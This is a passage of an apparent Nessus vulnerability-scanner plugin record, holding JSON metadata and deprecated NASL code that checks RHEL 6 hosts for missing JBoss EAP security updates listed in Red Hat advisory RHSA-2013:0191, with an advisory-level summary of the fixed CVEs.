(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": null, "vector": null}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 6 : JBoss EAP (RHSA-2013:0191)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2014-05-02T00:00:00", "id": "REDHAT-RHSA-2013-0191.NASL", "href": "https://www.tenable.com/plugins/nessus/64078", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# Disabled on 2013/06/06.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0191. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64078);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0191\");\n\n script_name(english:\"RHEL 6 : JBoss EAP (RHSA-2013:0191)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Application Platform 5.2.0 packages that fix\nmultiple security issues, various bugs, and add several enhancements\nare now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Application Platform 5.1.2, and\nincludes bug fixes and enhancements. Refer to the JBoss Enterprise\nApplication Platform 5.2.0 Release Notes for information on the most\nsignificant of these changes. 
The Release Notes will be available\nshortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. 
(CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. 
(CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5066.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1096.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2487.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2908.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4575.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-0034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-0874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-2377.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-2379.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-3369.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-3370.html\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-3546.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-5478.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/knowledge/docs/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2013-0191.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hsqldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:netty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n# Deprecated\nexit(0, \"This plugin has been temporarily deprecated.\");\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) 
audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL6\", reference:\"aopalliance-1.0-5.3.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"bsh2-2.0-0.b4.15.patch01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"bsh2-bsf-2.0-0.b4.15.patch01.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"google-guice-2.0-3.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-3.3.2-1.9.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-annotations-3.4.0-3.6.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.6.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-entitymanager-3.4.0-4.5.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.5.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-javadoc-3.3.2-1.9.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-search-3.1.1-2.5.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hibernate3-search-javadoc-3.1.1-2.5.GA_CP05.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hornetq-2.2.24-1.EAP.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"hornetq-native-2.2.20-1.EAP.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"hornetq-native-2.2.20-1.EAP.GA.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"hsqldb-1.8.0.10-11_patch_01.1.ep5.el6\")) flag++;\nif (rpm_check(release:\"RHEL6\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el6\")) flag++;\nif 
